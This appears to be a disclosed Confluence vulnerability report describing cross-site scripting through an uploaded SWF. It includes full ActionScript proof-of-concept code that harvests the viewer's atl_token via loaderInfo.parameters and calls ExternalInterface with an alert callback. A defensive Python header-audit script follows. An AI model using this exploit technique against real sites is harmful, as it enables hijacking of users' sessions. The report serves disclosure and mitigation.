XSS by SWF file

Type atlassian
Reporter maradrianbelen
Modified 2017-09-04T16:55:33


In the Confluence comment module a user can embed a .swf file in their comment. Confluence protects the attachment download with an atl_token parameter on the GET request, so if the attacker simply sends the victim the link to the .swf file (the value of the src attribute of the embed tag), the malicious .SWF will not execute in the victim's browser, because the token in the link belongs to the attacker, not to the victim.

This protection can be bypassed with this.loaderInfo.parameters inside the malicious .swf: this.loaderInfo.parameters.parameter_name returns the value of the named query-string parameter of the URL the SWF was loaded from, in this case atl_token, which is the token of whoever is viewing the comment. I also inserted an <a> tag into the malicious SWF that points back at the same .swf with the harvested atl_token and a callback=alert parameter, so if the victim clicks the link rendered by the embedded SWF, the .swf file is loaded top-level in the victim's browser on the Confluence origin and ExternalInterface.call invokes alert there.


{code}
package {
    import flash.display.Sprite;
    import flash.text.TextFormat;
    import flash.text.TextField;
    import flash.external.ExternalInterface;

    public class Main extends Sprite {

        public function Main() {
            super();
            var myFormat:TextFormat = new TextFormat();
            myFormat.size = 200;
            // loaderInfo.parameters exposes the query-string parameters of the URL the
            // SWF was loaded from; when Confluence embeds the attachment this includes
            // the viewing user's atl_token.
            var xcode:String = this.loaderInfo.parameters.atl_token;
            var myText:TextField = new TextField();
            myText.width = 1000;
            myText.height = 1000;
            // Link back to this same SWF, carrying the victim's own token (so the
            // download is accepted) and the name of the JavaScript function to call.
            myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>";
            addChild(myText);
            // Once loaded top-level with callback=alert, this becomes alert("xss")
            // executed in the Confluence origin.
            ExternalInterface.call(this.loaderInfo.parameters.callback, "xss");
        }
    }
}
{code}
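The root cause here is generic: a user-uploaded SWF served inline from the application's own origin will run with that origin's privileges, and any secret placed in its URL (here atl_token) is readable by the movie through loaderInfo.parameters. The check below is an added example written for this page, not Atlassian's code or fix. It models what loaderInfo.parameters exposes from a download URL and audits the response headers of an attachment download for the two conditions the report relies on. The hostname confluence.example, the attachment id and the header sets are constructed sample data.

```python
"""Audit an attachment download for inline-SWF execution risk.

Added example for this page, not Atlassian's code. The URL and header sets
below are constructed sample data.
"""
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

FLASH_MIME_TYPES = {
    "application/x-shockwave-flash",
    "application/vnd.adobe.flash.movie",
}

# Short finding codes with their explanation, used by audit_attachment_response().
DESCRIPTIONS = {
    "INLINE_SWF": "SWF is served inline on the application origin; "
                  "ExternalInterface.call would run script as that origin",
    "TOKEN_IN_URL": "atl_token is in the SWF's own URL and therefore readable "
                    "by the movie via this.loaderInfo.parameters",
}


def flashvars_from_url(url: str) -> Dict[str, str]:
    """Model of what an embedded SWF sees in this.loaderInfo.parameters:
    the query-string parameters of its own src URL as a flat name->value map
    (for a repeated name the last value wins)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def _is_flash(url: str, content_type: str) -> bool:
    # Match on the declared MIME type or the .swf extension: an <embed
    # type="application/x-shockwave-flash"> hands the bytes to the plugin
    # regardless of what Content-Type the server declared.
    path = urlsplit(url).path.lower()
    return content_type in FLASH_MIME_TYPES or path.endswith(".swf")


def audit_attachment_response(url: str, headers: Dict[str, str]) -> List[str]:
    """Return finding codes (keys of DESCRIPTIONS) for one attachment download.

    An empty list means the response would not let an attacker's SWF run in
    the viewer's session the way the report describes.
    """
    h = {k.lower(): v for k, v in headers.items()}
    content_type = h.get("content-type", "").split(";")[0].strip().lower()
    disposition = h.get("content-disposition", "").strip().lower()
    findings: List[str] = []

    # Content-Disposition: attachment forces a download, so the plugin never
    # executes the movie; anything else (absent or "inline") lets it run.
    inline_swf = _is_flash(url, content_type) and not disposition.startswith("attachment")
    if inline_swf:
        findings.append("INLINE_SWF")
        # The token only matters if the movie actually executes and can read it.
        if "atl_token" in flashvars_from_url(url):
            findings.append("TOKEN_IN_URL")
    return findings


# Constructed sample data (hostname and attachment id are assumptions).
SAMPLE_URL = ("https://confluence.example/download/attachments/1234/movie.swf"
              "?atl_token=0123456789abcdef")
VULNERABLE_HEADERS = {
    "Content-Type": "application/x-shockwave-flash",
    "Content-Disposition": "inline; filename=movie.swf",
}
HARDENED_HEADERS = {
    "Content-Type": "application/x-shockwave-flash",
    "Content-Disposition": 'attachment; filename="movie.swf"',
    "X-Content-Type-Options": "nosniff",
}

if __name__ == "__main__":
    for label, headers in (("vulnerable", VULNERABLE_HEADERS),
                           ("hardened", HARDENED_HEADERS)):
        codes = audit_attachment_response(SAMPLE_URL, headers)
        print(f"{label}: {codes or 'no findings'}")
        for code in codes:
            print(f"  {code}: {DESCRIPTIONS[code]}")
```

The disposition check is the one that matters: because the embed tag's type attribute selects the plugin, a non-Flash Content-Type alone does not stop the movie from running, which is why the check also keys on the .swf extension. Serving user uploads with Content-Disposition: attachment, or from a separate origin that carries no session or token, removes both findings at once.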